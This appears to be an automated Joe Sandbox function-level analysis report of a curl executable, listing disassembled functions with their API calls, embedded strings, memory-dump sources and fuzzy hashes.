Opcode Fuzzy Hash: fc6cb6ff7861b2aa46e9880a89394adda920110e6960fcb88534053c58bf5542
Instruction Fuzzy Hash: 27D15B70B097118FD724DF29D48075BBBE1BF84314F558A2EE8998B391E779E801CB86

Function 00451E89 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 0045201F
WSAGetLastError.WS2_32 ref: 00452078

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

Strings

Sending data failed (%d), xrefs: 00452025, 0045207E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$curl_mvsnprintfstrlen
String ID: Sending data failed (%d)
API String ID: 209986035-2319402659
Opcode ID: 6666fdb7cdea863d390987abf57e71d75831fd91dcf6b6cdd1089cc5b4d94a82
Instruction ID: f9f37d2d76104b201032405fe0698f86c287c46c98e560562217a5a9a527fd73
Opcode Fuzzy Hash: 6666fdb7cdea863d390987abf57e71d75831fd91dcf6b6cdd1089cc5b4d94a82
Instruction Fuzzy Hash: CC611B749082808FCB05DF68D4C4AEEBBF2BF59340F0486BAEC598B356D775A844CB65

Function 00410930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 00410A04
strlen.MSVCRT ref: 00410A13

Strings

%%%02X, xrefs: 004109F1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfstrlen
String ID: %%%02X
API String ID: 827415538-3569721977
Opcode ID: ae9a40d39820feaf1a7bf8abcde13c18cbdafe2ad0e9a9f9900d40da789c55e6
Instruction ID: ebfa19edf6d7f8f67c1ee1df3cbcae82e21f2713a670971b90f1a8cc805feacb
Opcode Fuzzy Hash: ae9a40d39820feaf1a7bf8abcde13c18cbdafe2ad0e9a9f9900d40da789c55e6
Instruction Fuzzy Hash: D13193716083148BC720DF25D88425BBBE4EB84750F05492FE48987301D279D985CBDA

Function 00442990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strtol.MSVCRT ref: 00442A11
strchr.MSVCRT ref: 00442A67

Strings

:, xrefs: 00442A5C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchrstrtol
String ID: :
API String ID: 1008397618-336475711
Opcode ID: 49d511d712e640c8d540a9a643352df15bfab44849d4d6b6be5d1090758d22d7
Instruction ID: cd361260803d8d5bd84c3ca752f56e66c27cb4a7e8d608d58323545e2701529a
Opcode Fuzzy Hash: 49d511d712e640c8d540a9a643352df15bfab44849d4d6b6be5d1090758d22d7
Instruction Fuzzy Hash: C62148B16057019BE750AF69DA8431BBBE4EF84759F85882EF889C7341E778D800CB66

Function 0042AB62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

curl_easy_strerror.CURL ref: 0042AC73

Strings

QUIT, xrefs: 0042AB95
Failure sending QUIT command: %s, xrefs: 0042AC78

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_easy_strerror
String ID: Failure sending QUIT command: %s$QUIT
API String ID: 1399792982-1162443993
Opcode ID: 6ffe00443989d0020b766f6ce5c95b41e0d424498f948d95d95b83d3e9fbba55
Instruction ID: 4db003c67ff393b89654c8b64c7d9aa592744a4f46d2397190758ac6a89f470a
Opcode Fuzzy Hash: 6ffe00443989d0020b766f6ce5c95b41e0d424498f948d95d95b83d3e9fbba55
Instruction Fuzzy Hash: 5231FAB02087108BDB10AF21D48475B7BE0BF40748F45497DEE888F246D779E855CBAB

Function 0042E772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

curl_strequal.CURL ref: 0042E7D9

Strings

OS/400, xrefs: 0042E7CE
SITE NAMEFMT 1, xrefs: 0042F38C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_strequal
String ID: OS/400$SITE NAMEFMT 1
API String ID: 1413590006-2049154998
Opcode ID: ec6f3b81707829717220903983a1ae49d2a010b863792633b43eb2c2b5ddb60f
Instruction ID: badbf1bc68f88358b588e789910779c1458ea84b1e40f71af90a955dcce7b856
Opcode Fuzzy Hash: ec6f3b81707829717220903983a1ae49d2a010b863792633b43eb2c2b5ddb60f
Instruction Fuzzy Hash: 382156B17083508BD7105F25E88436A7AE0BF81755F58047FED89CB396E77C8841DB5A

Function 00410A0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 00410A04
strlen.MSVCRT ref: 00410A13

Strings

%%%02X, xrefs: 004109F1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfstrlen
String ID: %%%02X
API String ID: 827415538-3569721977
Opcode ID: cf056eaf5c574852f28e6695aad391286a883dad650db839f70649f36359bc61
Instruction ID: b6dd794a51adb0684202c2b8c755224ef3f2abcf34cacd20a73c37e95b1bf659
Opcode Fuzzy Hash: cf056eaf5c574852f28e6695aad391286a883dad650db839f70649f36359bc61
Instruction Fuzzy Hash: 87214FB15083158FC720DF25D88429AF7E4AB84740F45896FE88597302E7B9E989CBD6

Function 00403490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

/* Here is a list of options the curl code used that cannot get generated, xrefs: 004034B9
ret = curl_easy_perform(hnd);, xrefs: 00403583

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_slist_append
String ID: /* Here is a list of options the curl code used that cannot get generated$ret = curl_easy_perform(hnd);
API String ID: 3558798127-3055971075
Opcode ID: d468faa4849ead7431a5112cad87bfbfd0a5c5a2645b74128d7e153aea81c0d6
Instruction ID: f9d23635226ba1c1ffa66d4f2e78f222d19ee78b6491c2c2c03bab056a91dac5
Opcode Fuzzy Hash: d468faa4849ead7431a5112cad87bfbfd0a5c5a2645b74128d7e153aea81c0d6
Instruction Fuzzy Hash: 7F21BC706047019AD710EF66998021A7FDCAA5074AF84883FDDC49F392EBBDD944DB1A

Function 0042354C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 004235A3
strcpy.MSVCRT ref: 004235D8
SetLastError.KERNEL32 ref: 004235EF

Strings

%lx, xrefs: 0042358C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastcurl_msnprintfstrcpy
String ID: %lx
API String ID: 4204188090-1448181948
Opcode ID: f9ad9ce226c4b767ba729e654adb877643c122891d6c4385e99490dc1a9f653b
Instruction ID: 44e69bd3dd210075691598d6f4b1a84d6dbadb68069d782a370c999800e8a5cd
Opcode Fuzzy Hash: f9ad9ce226c4b767ba729e654adb877643c122891d6c4385e99490dc1a9f653b
Instruction Fuzzy Hash: 1111E372F013649BCB318F1CE88025EB3B1AF81356F96462BD8AC57391E33C9984CB16

Function 00405802 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040580F
_strdup.MSVCRT ref: 00405837

Strings

list, xrefs: 0040584A

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupfree
String ID: list
API String ID: 1865132094-1154021400
Opcode ID: dfdc6adfaa805e20f2db14074d8a87974944b97a2cef52c5d2a218acc4ecbe7e
Instruction ID: bb3e0e07816d033c18158211a8eda9bb2b1eefde1be7b120b7838bd1602203f8
Opcode Fuzzy Hash: dfdc6adfaa805e20f2db14074d8a87974944b97a2cef52c5d2a218acc4ecbe7e
Instruction Fuzzy Hash: F3111CB02083849BDB319F25C9847AB77E4AFD5304F04892AED849F3D5D778D984CB1A

Function 0040D01C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

isprint.MSVCRT ref: 0040CF9C
curl_msnprintf.CURL ref: 0040CFC3

Strings

\%03o, xrefs: 0040CFB3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfisprint
String ID: \%03o
API String ID: 3412058451-2703259314
Opcode ID: 613c0cbc7d5b666298479192cc8155d34a01c5e4ec5adbd2cc730c1ec9bc1a2f
Instruction ID: 89b5a98ffe26c6b43f91721ac3315c892aca7882ee8d2d8251a1a11f0ac5877d
Opcode Fuzzy Hash: 613c0cbc7d5b666298479192cc8155d34a01c5e4ec5adbd2cc730c1ec9bc1a2f
Instruction Fuzzy Hash: F801D4B1A853558AE7204F24D8843A7BBE2AF50309F0D813FE4C8673D2E23D4889974B

Function 00414BE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00414C3C
WSAGetLastError.WS2_32 ref: 00414C4D

Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413822
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413941
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413961
Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413975
Part of subcall function 00413810: SetLastError.KERNEL32 ref: 00413981
Part of subcall function 00413810: FormatMessageA.KERNEL32 ref: 00413B3C
Part of subcall function 00413810: curl_msnprintf.CURL ref: 00413B68

Part of subcall function 004166C0: curl_mvsnprintf.CURL(?,?,?,?,?,?,?,?,0041AB91), ref: 004166EA
Part of subcall function 004166C0: strlen.MSVCRT ref: 00416710

getsockname.WS2_32 ref: 00414D21
GetLastError.KERNEL32 ref: 00414D4F
WSAGetLastError.WS2_32 ref: 00414D80

Strings

getpeername() failed with errno %d: %s, xrefs: 00414C65

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$strrchr$FormatMessagecurl_msnprintfcurl_mvsnprintfgetpeernamegetsocknamestrlen
String ID: getpeername() failed with errno %d: %s
API String ID: 1795755352-3675929643
Opcode ID: 33bd018fe1336ef1b063c4c65c053d04ba68c1c9cb22079fbdc5a3dc3268ab6b
Instruction ID: a87411889bc35bce1e8f6a741109ddebdaa93e97229e4a158bd33fd26413cfec
Opcode Fuzzy Hash: 33bd018fe1336ef1b063c4c65c053d04ba68c1c9cb22079fbdc5a3dc3268ab6b
Instruction Fuzzy Hash: D0018071905308AFCB10AF66D8486CABBF8FF81350F01C46EE98897200E7349985CFE6

Function 00407300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

curl_version_info.CURL ref: 0040730C

Strings

dict, xrefs: 00407338
`FF, xrefs: 0040733D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_version_info
String ID: `FF$dict
API String ID: 1810624377-2510832286
Opcode ID: dfa5bb5daef11a7e43702c22b59a61cd874e2a607e2af59e01a4ff70e28201bf
Instruction ID: b0569ef654c23ac95a24ae79545f0f14ecd8117296bdd3c8bbe1c724ba7d7803
Opcode Fuzzy Hash: dfa5bb5daef11a7e43702c22b59a61cd874e2a607e2af59e01a4ff70e28201bf
Instruction Fuzzy Hash: 86018F74E082014BF724DF29D44075B76E1EB85310F58857EDC849B344E77CE880DB9A

Function 0040CF5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

isprint.MSVCRT ref: 0040CF9C
curl_msnprintf.CURL ref: 0040CFC3

Strings

\%03o, xrefs: 0040CFB3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintfisprint
String ID: \%03o
API String ID: 3412058451-2703259314
Opcode ID: 8cf1b5dd432c10e5f00d9149c037399c78f99c5ab8b0f38a2839390bef65f470
Instruction ID: ba82f32ed02b7b9f685fd2054d4fa27c298eac1b9ed58056e2a907ce51f989c5
Opcode Fuzzy Hash: 8cf1b5dd432c10e5f00d9149c037399c78f99c5ab8b0f38a2839390bef65f470
Instruction Fuzzy Hash: 8401D6B1E853558EE7215F2598843A77BD1AB41309F4D812FE8C8173D2E23D4889975B

Function 00401590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 004015A4
strrchr.MSVCRT ref: 004015B6

Strings

\, xrefs: 004015A9

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strrchr
String ID: \
API String ID: 3418686817-2967466578
Opcode ID: 165024c9ee9236f512fd6b1bd0b05ec15807be043ea2ee6b023d92f86d8aab33
Instruction ID: 3e9144ca0d40d2c567dcb2469815a831a3b223e375b9141011a9f2598235e16d
Opcode Fuzzy Hash: 165024c9ee9236f512fd6b1bd0b05ec15807be043ea2ee6b023d92f86d8aab33
Instruction Fuzzy Hash: 99F096715093125BDF10AF18ACC069BF3E2BB80358F45867ED8895B342E239DC4987A5

Function 00417520 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 00417535
tolower.MSVCRT ref: 00417560

Strings

%s:%d, xrefs: 0041752E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintftolower
String ID: %s:%d
API String ID: 250101073-1029262843
Opcode ID: 478919649c3e20f114952b539659361cc59f71f5172643f366cbb07fdb2af310
Instruction ID: f1956c8838e3b676b8d43109897b8518891e277a104a60cb0127a7af5ffd0641
Opcode Fuzzy Hash: 478919649c3e20f114952b539659361cc59f71f5172643f366cbb07fdb2af310
Instruction Fuzzy Hash: F8F0547160C3505ECB109B2D98C52E76FF79B82390F88486BE4D487716D27E49C487A7

Function 004435FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

curl_msnprintf.CURL ref: 0044355B
strlen.MSVCRT ref: 00443581
curl_msnprintf.CURL ref: 00443635

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

Strings

%c%c==, xrefs: 0044360A

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$curl_mvsnprintfstrlen
String ID: %c%c==
API String ID: 3796604035-3620476513
